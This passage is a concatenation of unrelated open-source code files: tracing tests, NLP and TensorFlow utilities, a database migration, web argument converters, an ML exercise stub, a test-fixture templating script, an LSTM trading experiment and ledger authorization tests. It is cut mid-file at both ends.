client = self.make_client([b"STORED\r", b"\n", b"DELETED\r\n"])
result = client.add(b"key", b"value", noreply=False)
result = client.delete_many([b"key"], noreply=False)
assert result is True
self.check_spans(2, ["add", "delete"], ["add key", "delete key"])
class PymemcacheClientConfiguration(TracerTestCase):
"""Ensure that pymemache can be configured properly."""
def setUp(self):
patch()
def tearDown(self):
unpatch()
def make_client(self, mock_socket_values, **kwargs):
tracer = DummyTracer()
Pin.override(pymemcache, tracer=tracer)
self.client = pymemcache.client.base.Client((TEST_HOST, TEST_PORT), **kwargs)
self.client.sock = MockSocket(list(mock_socket_values))
return self.client
def test_same_tracer(self):
"""Ensure same tracer reference is used by the pin on pymemache and
Clients.
"""
client = pymemcache.client.base.Client((TEST_HOST, TEST_PORT))
self.assertEqual(Pin.get_from(client).tracer, Pin.get_from(pymemcache).tracer)
def test_override_parent_pin(self):
"""Test that the service set on `pymemcache` is used for Clients."""
Pin.override(pymemcache, service="mysvc")
client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"])
client.set(b"key", b"value", noreply=False)
pin = Pin.get_from(pymemcache)
tracer = pin.tracer
spans = tracer.pop()
self.assertEqual(spans[0].service, "mysvc")
def test_override_client_pin(self):
"""Test that the service set on `pymemcache` is used for Clients."""
client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"])
Pin.override(client, service="mysvc2")
client.set(b"key", b"value", noreply=False)
pin = Pin.get_from(pymemcache)
tracer = pin.tracer
spans = tracer.pop()
self.assertEqual(spans[0].service, "mysvc2")
@TracerTestCase.run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_user_specified_service(self):
"""
When a user specifies a service for the app
The pymemcache integration should not use it.
"""
# Ensure that the service name was configured
from ddtrace import config
assert config.service == "mysvc"
client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"])
client.set(b"key", b"value", noreply=False)
pin = Pin.get_from(pymemcache)
tracer = pin.tracer
spans = tracer.pop()
assert spans[0].service != "mysvc"
|
convlab2/laug/Text_Paraphrasing/utils.py | ljw23/ConvLab-2 | 339 | 12748173 | # -*- coding: utf-8 -*-
from convlab2.util.multiwoz.paraphrase_span_detection import phrase_idx_utt
def paraphrase_span_detection(new_text,span_info):
new_words=new_text.split()
new_span_info=[]
for span in span_info:
span_words=span[2].split()
result=phrase_idx_utt(span_words,new_words)
if result is not None:
max_start,max_end=result
new_span_info.append([span[0],span[1],' '.join(new_words[max_start:max_end+1]),max_start,max_end])
return new_span_info
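# Hedged example: the utterance and spans below are made up, with span_info rows in the
# [dialog_act, slot, value, start_idx, end_idx] layout expected above; the function
# re-locates each value in the paraphrased token sequence and rewrites its indices.
def _example_paraphrase_span_detection():
    new_text = 'i am looking for a cheap hotel in the centre'
    span_info = [['Hotel-Inform', 'Price', 'cheap', 5, 5],
                 ['Hotel-Inform', 'Area', 'centre', 9, 9]]
    return paraphrase_span_detection(new_text, span_info)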
def span2tuple(span_info):
t=[]
for span in span_info:
t.append((span[0].split('-')[1],span[0].split('-')[0],span[1],span[2]))
return t |
tensorflow_examples/lite/model_maker/core/task/recommendation.py | duy-maimanh/examples | 6,484 | 12748193 | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""APIs to train an on-device recommendation model."""
import collections
import tempfile
import numpy as np
import tensorflow as tf
from tensorflow_examples.lite.model_maker.core.api import mm_export
from tensorflow_examples.lite.model_maker.core.data_util import data_util
from tensorflow_examples.lite.model_maker.core.data_util import recommendation_config
from tensorflow_examples.lite.model_maker.core.export_format import ExportFormat
from tensorflow_examples.lite.model_maker.core.task import custom_model
from tensorflow_examples.lite.model_maker.core.task import model_util
from tensorflow_examples.lite.model_maker.core.task.model_spec import recommendation_spec
from tensorflow_examples.lite.model_maker.third_party.recommendation.ml.model import input_pipeline
from tensorflow_examples.lite.model_maker.third_party.recommendation.ml.model import metrics as _metrics
from tensorflow_examples.lite.model_maker.third_party.recommendation.ml.model import recommendation_model_launcher as _launcher
@mm_export('recommendation.Recommendation')
class Recommendation(custom_model.CustomModel):
"""Recommendation task class."""
DEFAULT_EXPORT_FORMAT = (ExportFormat.TFLITE,)
ALLOWED_EXPORT_FORMAT = (ExportFormat.LABEL, ExportFormat.TFLITE,
ExportFormat.SAVED_MODEL)
# ID = 0 means a placeholder to OOV. Used for padding.
OOV_ID = 0
def __init__(self,
model_spec,
model_dir,
shuffle=True,
learning_rate=0.1,
gradient_clip_norm=1.0):
"""Init recommendation model.
Args:
model_spec: recommendation model spec.
model_dir: str, path to export model checkpoints and summaries.
shuffle: boolean, whether the training data should be shuffled.
learning_rate: float, learning rate.
gradient_clip_norm: float, clip threshold (<= 0 meaning no clip).
"""
if not isinstance(model_spec, recommendation_spec.RecommendationSpec):
raise ValueError(
'Expect RecommendationSpec but got model_spec: {}'.format(model_spec))
self._model_dir = model_dir
self._learning_rate = learning_rate
self._gradient_clip_norm = gradient_clip_norm
super(Recommendation, self).__init__(model_spec, shuffle=shuffle)
@property
def input_spec(self) -> recommendation_config.InputSpec:
return self.model_spec.input_spec
@property
def model_hparams(self) -> recommendation_config.ModelHParams:
return self.model_spec.model_hparams
def create_model(self, do_train=True):
"""Creates a model.
Args:
do_train: boolean. Whether to train the model.
Returns:
Keras model.
"""
self.model = self.model_spec.create_model()
if do_train:
_launcher.compile_model(self.model, self.model_hparams.eval_top_k,
self._learning_rate, self._gradient_clip_norm)
def train(self,
train_data,
validation_data=None,
batch_size=16,
steps_per_epoch=100,
epochs=1):
"""Feeds the training data for training.
Args:
train_data: Training dataset.
validation_data: Validation data. If None, skips validation process.
batch_size: int, the batch size.
      steps_per_epoch: int, the number of steps per epoch.
epochs: int, number of epochs.
Returns:
History from model.fit().
"""
batch_size = batch_size if batch_size else self.model_spec.batch_size
train_ds = train_data.gen_dataset(
batch_size, is_training=True, shuffle=self.shuffle)
if validation_data:
validation_ds = validation_data.gen_dataset(batch_size, is_training=False)
else:
validation_ds = None
self.create_model(do_train=True)
history = self.model.fit(
x=train_ds,
validation_data=validation_ds,
steps_per_epoch=steps_per_epoch,
epochs=epochs,
callbacks=self._keras_callbacks(self._model_dir))
tf.get_logger().info(history)
return history
def evaluate(self, data, batch_size=10):
"""Evaluate the model.
Args:
data: Evaluation data.
batch_size: int, batch size for evaluation.
Returns:
History from model.evaluate().
"""
batch_size = batch_size if batch_size else self.model_spec.batch_size
eval_ds = data.gen_dataset(batch_size, is_training=False)
history = self.model.evaluate(eval_ds)
tf.get_logger().info(history)
return history
def _keras_callbacks(self, model_dir):
"""Returns a list of default keras callbacks for `model.fit`."""
return _launcher.get_callbacks(self.model, model_dir)
def _get_serve_fn(self, keras_model):
"""Gets serve fn for exporting model."""
input_specs = input_pipeline.get_serving_input_specs(self.input_spec)
return keras_model.serve.get_concrete_function(**input_specs)
def _export_tflite(self, tflite_filepath):
"""Exports tflite model."""
serve_fn = self._get_serve_fn(self.model)
    # Providing trackable objects is now recommended since it makes the concrete
    # function conversion API use the new SavedModel importer, which enables new
    # TensorFlow Lite features, including variable support, resources and variant
    # tensors, and the signature concept.
if float('.'.join(tf.__version__.split('.')[:2])) >= 2.7:
converter = tf.lite.TFLiteConverter.from_concrete_functions([serve_fn],
self.model)
else:
converter = tf.lite.TFLiteConverter.from_concrete_functions([serve_fn])
tflite_model = converter.convert()
with tf.io.gfile.GFile(tflite_filepath, 'wb') as f:
f.write(tflite_model)
def _export_saved_model(self, filepath):
serve_fn = self._get_serve_fn(self.model)
signatures = {tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY: serve_fn}
tf.saved_model.save(self.model, export_dir=filepath, signatures=signatures)
def evaluate_tflite(self, tflite_filepath, data):
"""Evaluates the tflite model.
The data is padded to required length, and multiple metrics are evaluated.
Args:
tflite_filepath: File path to the TFLite model.
data: Data to be evaluated.
Returns:
Dict of (metric, value), evaluation result of TFLite model.
"""
label_name = self.input_spec.label_feature.feature_name
lite_runner = model_util.get_lite_runner(tflite_filepath, self.model_spec)
ds = data.gen_dataset(batch_size=1, is_training=False)
max_output_size = data.max_vocab_id + 1 # +1 because 0 is reserved for OOV.
eval_top_k = self.model_hparams.eval_top_k
metrics = [
_metrics.GlobalRecall(top_k=k, name=f'Global_Recall/Recall_{k}')
for k in eval_top_k
]
for feature, y_true in data_util.generate_elements(ds):
feature.pop(label_name)
x = feature
ids, scores = lite_runner.run(x)
# y_true: shape [1, 1]
# y_pred: shape [1, max_output_size]; fill only scores with top-k ids.
y_pred = np.zeros([1, max_output_size])
for i, score in zip(ids, scores):
if i in data.vocab: # Only set if id is in vocab.
y_pred[0, i] = score
# Update metrics.
for m in metrics:
m.update_state(y_true, y_pred)
result = collections.OrderedDict([(m.name, m.result()) for m in metrics])
return result
@classmethod
def create(cls,
train_data,
model_spec: recommendation_spec.RecommendationSpec,
model_dir: str = None,
validation_data=None,
batch_size: int = 16,
steps_per_epoch: int = 10000,
epochs: int = 1,
learning_rate: float = 0.1,
gradient_clip_norm: float = 1.0,
shuffle: bool = True,
do_train: bool = True):
"""Loads data and train the model for recommendation.
Args:
train_data: Training data.
model_spec: ModelSpec, Specification for the model.
model_dir: str, path to export model checkpoints and summaries.
validation_data: Validation data.
batch_size: Batch size for training.
      steps_per_epoch: int, Number of steps per epoch.
epochs: int, Number of epochs for training.
learning_rate: float, learning rate.
gradient_clip_norm: float, clip threshold (<= 0 meaning no clip).
shuffle: boolean, whether the training data should be shuffled.
do_train: boolean, whether to run training.
Returns:
An instance based on Recommendation.
"""
# Use model_dir or a temp folder to store intermediate checkpoints, etc.
if model_dir is None:
model_dir = tempfile.mkdtemp()
recommendation = cls(
model_spec,
model_dir=model_dir,
shuffle=shuffle,
learning_rate=learning_rate,
gradient_clip_norm=gradient_clip_norm)
if do_train:
tf.compat.v1.logging.info('Training recommendation model...')
recommendation.train(
train_data,
validation_data,
batch_size=batch_size,
steps_per_epoch=steps_per_epoch,
epochs=epochs)
else:
recommendation.create_model(do_train=False)
return recommendation
# Shortcut function.
create = Recommendation.create
mm_export('recommendation.create').export_constant(__name__, 'create')
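# Hedged usage sketch: train_data/test_data are assumed to be recommendation
# dataloaders and spec a RecommendationSpec built elsewhere; the values are
# illustrative and this helper is never invoked on import.
def _example_train_and_evaluate(train_data, test_data, spec, model_dir=None):
  model = create(train_data, model_spec=spec, model_dir=model_dir,
                 steps_per_epoch=100, epochs=1)
  return model.evaluate(test_data, batch_size=10)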
|
migrations/versions/9d370f33f1a0_user_login_types.py | pombredanne/vulncode-db | 592 | 12748198 |
"""user login types
Revision ID: 9d370f33f1a0
Revises: <KEY>
Create Date: 2020-11-30 12:58:31.046646
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = "9d370f33f1a0"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column(
"user",
sa.Column(
"login_type",
sa.Enum("LOCAL", "GOOGLE", "GITHUB", name="logintype"),
nullable=True,
),
)
# ### end Alembic commands ###
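# Rough SQL equivalent of the upgrade step on MySQL (illustrative only; the exact DDL
# emitted by Alembic/SQLAlchemy may differ):
#   ALTER TABLE `user` ADD COLUMN login_type ENUM('LOCAL', 'GOOGLE', 'GITHUB') NULL;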
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column("user", "login_type")
# ### end Alembic commands ###
|
bocadillo/converters.py | teaglebuilt/bocadillo | 434 | 12748239 |
import decimal
import inspect
from datetime import date, datetime, time
from functools import wraps
import typing
import typesystem
FIELD_ALIASES: typing.Dict[typing.Type, typesystem.Field] = {
int: typesystem.Integer,
float: typesystem.Float,
bool: typesystem.Boolean,
decimal.Decimal: typesystem.Decimal,
date: typesystem.Date,
time: typesystem.Time,
datetime: typesystem.DateTime,
}
class PathConversionError(typesystem.ValidationError):
pass
class Converter:
__slots__ = ("func", "signature", "annotations", "required_params")
def __init__(self, func: typing.Callable):
self.func = func
self.signature = inspect.signature(self.func)
self.annotations: typing.Dict[str, typing.Type] = {
param.name: param.annotation
for param in self.signature.parameters.values()
if param.annotation is not inspect.Parameter.empty
}
self.required_params = set(
param.name
for param in self.signature.parameters.values()
if param.default is inspect.Parameter.empty
)
def convert(self, args: tuple, kwargs: dict) -> typing.Tuple[tuple, dict]:
bound: inspect.BoundArguments = self.signature.bind(*args, **kwargs)
errors: typing.List[typesystem.ValidationError] = []
for param_name, value in bound.arguments.items():
try:
annotation = self.annotations[param_name]
except KeyError:
continue
# Find the TypeSystem field for the parameter's annotation.
if isinstance(annotation, typesystem.Field):
field = annotation
else:
try:
field = FIELD_ALIASES[annotation]()
except KeyError:
continue
# Perform validation.
try:
value = field.validate(value)
except typesystem.ValidationError as exc:
# NOTE: `add_prefix` sets the key of the error in the final
# error's dict representation.
errors.extend(exc.messages(add_prefix=param_name))
else:
bound.arguments[param_name] = value
if errors:
raise PathConversionError(messages=errors)
# NOTE: apply defaults last to prevent validating the default values.
# It's faster and less bug-prone.
bound.apply_defaults()
return bound.args, bound.kwargs
class ViewConverter(Converter):
__slots__ = ("query_parameters",)
def __init__(self, func: typing.Callable):
super().__init__(func)
self.query_parameters = set(
param.name
for param in self.signature.parameters.values()
if param.default is not inspect.Parameter.empty
)
def get_query_params(self, args: tuple, kwargs: dict) -> dict:
raise NotImplementedError
def convert(self, args: tuple, kwargs: dict) -> typing.Tuple[tuple, dict]:
query_params = self.get_query_params(args, kwargs)
for param_name in self.query_parameters:
if param_name in query_params:
kwargs[param_name] = query_params[param_name]
return super().convert(args, kwargs)
def convert_arguments(
func: typing.Callable, converter_class: typing.Type[Converter]
) -> typing.Callable:
converter = converter_class(func)
@wraps(func)
async def converted(*args, **kwargs):
args, kwargs = converter.convert(args, kwargs)
return await func(*args, **kwargs)
return converted
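# Hedged illustration of the decorator above: the async function and values are
# hypothetical, but typesystem should coerce "42" to an int (or raise
# PathConversionError) before the wrapped function runs.
async def _example_show(pk: int, when: date = date(2019, 1, 1)):
    return pk, when

_example_show_converted = convert_arguments(_example_show, converter_class=Converter)
# e.g. `await _example_show_converted("42")` should yield (42, datetime.date(2019, 1, 1))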
|
machine-learning-ex7/ex7/computeCentroids.py | ShawnT4ever/coursera-ml-py | 1,333 | 12748242 |
import numpy as np
def compute_centroids(X, idx, K):
# Useful values
(m, n) = X.shape
# You need to return the following variable correctly.
centroids = np.zeros((K, n))
# ===================== Your Code Here =====================
# Instructions: Go over every centroid and compute mean of all points that
# belong to it. Concretely, the row vector centroids[i]
# should contain the mean of the data points assigned to
# centroid i.
#
# ==========================================================
return centroids
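# Hedged reference sketch (not the graded solution): one straightforward way to fill in
# the section above, kept as a separate helper so the exercise stub stays untouched.
def compute_centroids_reference(X, idx, K):
    (m, n) = X.shape
    centroids = np.zeros((K, n))
    for k in range(K):
        members = X[(idx == k).flatten()]  # points currently assigned to centroid k
        if members.size > 0:
            centroids[k] = np.mean(members, axis=0)
    return centroids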
|
foundations_ui/cypress/fixtures/atlas_scheduler/envsubst.py | DeepLearnI/atlas | 296 | 12748254 |
def _flattened_config_walk():
import os
import os.path as path
for dir_name, _, files in os.walk('cypress/fixtures/atlas_scheduler/.foundations'):
for file_name in files:
if file_name.endswith('.envsubst.yaml'):
yield path.join(dir_name, file_name)
def _config():
import os
import sys
import subprocess
for required_env in [
'CYPRESS_LOCAL_FOUNDATIONS_HOME',
'CYPRESS_SCHEDULER_IP',
'CYPRESS_SCHEDULER_FOUNDATIONS_HOME',
'CYPRESS_SCHEDULER_REDIS_PORT',
'CYPRESS_GUI_HOST',
'CYPRESS_GUI_PORT']:
if not os.environ.get(required_env, None):
print(f'Environment variable {required_env} is not set.')
sys.exit(1)
for template_file_name in _flattened_config_walk():
output_file_name = template_file_name[:-len('.envsubst.yaml')] + '.yaml'
subprocess.run(f'envsubst < {template_file_name} > {output_file_name}', shell=True)
_config()
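# Illustration with a hypothetical template name: a file such as
#   cypress/fixtures/atlas_scheduler/.foundations/config/scheduler.envsubst.yaml
# is rendered next to itself as scheduler.yaml, equivalent to running
#   envsubst < scheduler.envsubst.yaml > scheduler.yaml
# in a shell with the CYPRESS_* variables exported.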
|
DataFlow_Suite/lstm_exec.py | seenu037/algotrading | 200 | 12748256 |
import tensorflow as tf
import numpy as np
import numpy.random as rng
import pandas.io.data as web
import numpy as np
import pandas as pd
def get_prices(symbol):
start, end = '2007-05-02', '2016-04-11'
data = web.DataReader(symbol, 'yahoo', start, end)
data=pd.DataFrame(data)
prices=data['Adj Close']
prices=prices.astype(float)
return prices
def get_returns(prices):
return ((prices-prices.shift(-1))/prices)[:-1]
def get_data(list):
l = []
for symbol in list:
rets = get_returns(get_prices(symbol))
l.append(rets)
return np.array(l).T
symbol_list = ['C', 'GS']
rets = get_data(symbol_list)
def lstm_iterator(raw_data, num_steps, data_size):
batch_size=1
raw_data = np.array(raw_data, dtype=np.float32)
data_len = len(raw_data)
batch_len = data_len // batch_size
data = np.zeros([batch_size, batch_len, data_size], dtype=np.float32)
for i in range(batch_size):
data[i] = raw_data[batch_len * i:batch_len * (i + 1),:]
epoch_size = (batch_len - 1) // num_steps
if epoch_size == 0:
raise ValueError("epoch_size == 0, decrease batch_size or num_steps")
for i in range(epoch_size):
x = data[:, i*num_steps:(i+1)*num_steps]
y = data[:, i*num_steps+1:(i+1)*num_steps+1]
yield (x[0], y[0])
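# Hedged illustration of the iterator contract: with toy returns of shape (T, 2) and
# num_steps=4, each yielded pair (x, y) holds num_steps rows, where y is x shifted
# forward by one time step; the toy array is a stand-in for `rets` above.
def _example_lstm_iterator_shapes(num_steps=4):
    toy = np.random.randn(64, 2).astype(np.float32)
    for x, y in lstm_iterator(toy, num_steps, data_size=2):
        assert x.shape == (num_steps, 2) and y.shape == (num_steps, 2)
        break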
class LSTMModel(object):
def __init__(self, num_steps, num_samples):#, config):
symbol_list = ['C', 'GS']
positions = tf.constant([-1,0,1]) #long, neutral or short
num_positions = 3
num_symbols = len(symbol_list)
self.num_samples = num_samples
self.num_steps = num_steps
#n_input = num_symbols * 100
hidden_size=21
n_classes = num_positions * num_symbols
#self.num_steps = tf.placeholder(tf.int64)
# define placeholders
self.inputs_ = tf.placeholder(tf.float32, [None, num_symbols])
self.targets_ = tf.placeholder(tf.float32, [None, num_symbols])
cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_size, forget_bias=0.0, state_is_tuple=True)
#cell = tf.nn.rnn_cell.MultiRNNCell([cell] * config.num_layers)
cell = tf.nn.rnn_cell.InputProjectionWrapper(cell, num_symbols)
cell = tf.nn.rnn_cell.OutputProjectionWrapper(cell, n_classes)
outputs=[]
self.initial_state = cell.zero_state(1, tf.float32)
state = self.initial_state
time_step = 0
'''with tf.variable_scope("RNN"):
def body(x):
inp = self.inputs_[time_step,:]
inp = tf.reshape(inp, [1,-1])
(cell_output, state) = cell(inp, state)
outputs.append(cell_output)
return
def condition(x):
return tf.reduce_sum(x) < 100
tf.while_loop(condition, body, [x])'''
with tf.variable_scope("RNN"):
for time_step in range(self.num_steps): #####num_steps???
if time_step > 0: tf.get_variable_scope().reuse_variables()
inp = self.inputs_[time_step,:]
inp = tf.reshape(inp, [1,-1])
(cell_output, state) = cell(inp, state)
outputs.append(cell_output) #[6,]
self.final_state = state
y = tf.reshape(tf.concat(1, outputs), [-1, n_classes])
# loop through symbol, taking the columns for each symbol's bucket together
pos = {}
sample_n = {}
sample_mask = {}
symbol_returns = {}
relevant_target_column = {}
for i in range(num_symbols):
# isolate the buckets relevant to the symbol and get a softmax as well
symbol_probs = y[:,i*num_positions:(i+1)*num_positions]
symbol_probs_softmax = tf.nn.softmax(symbol_probs) # softmax[i, j] = exp(logits[i, j]) / sum(exp(logits[i]))
            # sample probability to choose our policy's action
sample = tf.multinomial(tf.log(symbol_probs_softmax), num_samples)
for sample_iter in range(num_samples):
sample_n[i*num_samples + sample_iter] = sample[:,sample_iter]
pos[i*num_samples + sample_iter] = tf.reshape(sample_n[i*num_samples + sample_iter], [-1]) - 1
symbol_returns[i*num_samples + sample_iter] = tf.mul(
tf.cast(pos[i*num_samples + sample_iter], tf.float32),
self.targets_[:,i])
sample_mask[i*num_samples + sample_iter] = tf.cast(tf.reshape(tf.one_hot(sample_n[i*num_samples + sample_iter], 3), [-1,3]), tf.float32)
relevant_target_column[i*num_samples + sample_iter] = tf.reduce_sum(
symbol_probs * sample_mask[i*num_samples + sample_iter],1)
daily_returns_by_symbol_ = tf.concat(1, [tf.reshape(t, [-1,1]) for t in symbol_returns.values()])
daily_returns_by_symbol = tf.transpose(tf.reshape(daily_returns_by_symbol_, [-1,2,num_samples]), [0,2,1]) #[?,5,2]
daily_returns = tf.reduce_mean(daily_returns_by_symbol, 2) # [?,5]
total_return = tf.reduce_prod(daily_returns+1, 0)
z = tf.ones_like(total_return) * -1
self.total_return = total_return = tf.add(total_return, z)
ann_vol = tf.mul(
tf.sqrt(tf.reduce_mean(tf.pow((daily_returns - tf.reduce_mean(daily_returns, 0)),2),0)) ,
np.sqrt(252)
)
self.sharpe = tf.div(total_return, ann_vol)
#Maybe metric slicing later
#segment_ids = tf.ones_like(daily_returns[:,0])
#partial_prod = tf.segment_prod(daily_returns+1, segment_ids)
training_target_cols = tf.concat(1, [tf.reshape(t, [-1,1]) for t in relevant_target_column.values()])
ones = tf.ones_like(training_target_cols)
gradient_ = tf.nn.sigmoid_cross_entropy_with_logits(training_target_cols, ones)
gradient = tf.transpose(tf.reshape(gradient_, [-1,2,num_samples]), [0,2,1]) #[?,5,2]
#cost = tf.mul(gradient , daily_returns_by_symbol_reshaped)
#cost = tf.mul(gradient , tf.expand_dims(daily_returns, -1))
cost = tf.mul(gradient , tf.expand_dims(total_return, -1))
#cost = tf.mul(gradient , tf.expand_dims(sharpe, -1))
self.optimizer = tf.train.GradientDescentOptimizer(0.0001).minimize(cost)
self.costfn = tf.reduce_mean(cost)
def run_train_results(m, epoch):
state = m.initial_state.eval()
rs = rets[:-200]
full_feed = {m.inputs_: rs[:-1], m.targets_: rs[1:], m.initial_state: state}
t,s, c = session.run([ m.total_return, m.sharpe, m.costfn], feed_dict=full_feed)
t = np.mean(t)
s = np.mean(s)
print("Epoch:", '%04d' % (epoch+1), "cost=",c, "total return=", "{:.9f}".format(t),
"sharpe=", "{:.9f}".format(s))
return t
def run_test_results(m, epoch):
state = m.initial_state.eval()
rs = rets[-200:]
full_feed = {m.inputs_: rs[:-1], m.targets_: rs[1:], m.initial_state: state}
t,s, c = session.run([ m.total_return, m.sharpe, m.costfn], feed_dict=full_feed)
t = np.mean(t)
s = np.mean(s)
print("Epoch:", '%04d' % (epoch+1), "cost=",c, "total return=", "{:.9f}".format(t),
"sharpe=", "{:.9f}".format(s))
return t
def run_epoch(m, epoch):
full_feed = {m.inputs_: rets[:-1], m.targets_: rets[1:]}
state = m.initial_state.eval()
for step, (x, y) in enumerate(lstm_iterator(rets,20,2 )):
#m.num_steps = len(x)
feed_dict = {m.inputs_: x, m.targets_: y, m.initial_state: state}
_ , state = session.run([m.optimizer, m.final_state], feed_dict=feed_dict)
return
results = []
pos_results = []
with tf.Graph().as_default(), tf.Session() as session:
with tf.variable_scope("model", reuse=None):#, initializer=init):
m = LSTMModel(num_steps = 20, num_samples = 5)#, config=config)
with tf.variable_scope("model", reuse=True):#, initializer=init):
mvalid = LSTMModel(num_steps = len(rets[:-200]) -1, num_samples = 1)#, config=config)
with tf.variable_scope("model", reuse=True):#, initializer=init):
mtest = LSTMModel(num_steps = len(rets[-200:]) -1, num_samples = 1)
tf.initialize_all_variables().run()
for epoch in range(10):
run_epoch(m, epoch )
print('getting results...')
trt = run_train_results(mvalid, epoch)
print('trt')
ttt = run_test_results(mtest, epoch)
print('test: ',ttt)
results.append(ttt)
if trt>0:
pos_results.append(ttt)
print(np.mean(results))
print(np.mean(pos_results))
|
indy_common/test/auth/metadata/test_auth_rule_with_metadata_simple.py | Rob-S/indy-node | 627 | 12748270 | <reponame>Rob-S/indy-node
from indy_common.authorize.auth_constraints import AuthConstraint, IDENTITY_OWNER, AuthConstraintForbidden
from indy_common.constants import ENDORSER
from indy_common.test.auth.metadata.helper import validate, PLUGIN_FIELD, Action
from plenum.common.constants import TRUSTEE
MAX_SIG_COUNT = 3
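# Each test below enumerates the Action combinations that are expected to satisfy
# the given AuthConstraint; helper.validate checks them against the validator.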
def test_plugin_simple_rule_1_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=IDENTITY_OWNER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s},
is_owner=True, amount=2, extra_sigs=False)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=IDENTITY_OWNER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={IDENTITY_OWNER: s1, ENDORSER: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_endorser_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=ENDORSER, endorser=None, sigs={ENDORSER: s},
is_owner=True, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=ENDORSER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_endorser_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=ENDORSER, endorser=ENDORSER, sigs={ENDORSER: s},
is_owner=True, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=ENDORSER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=None, sigs={ENDORSER: s1, TRUSTEE: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: s2, ENDORSER: s3},
is_owner=True, amount=2, extra_sigs=True)
for s2 in range(1, MAX_SIG_COUNT + 1)
for s3 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s},
is_owner=True, amount=2, extra_sigs=False)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
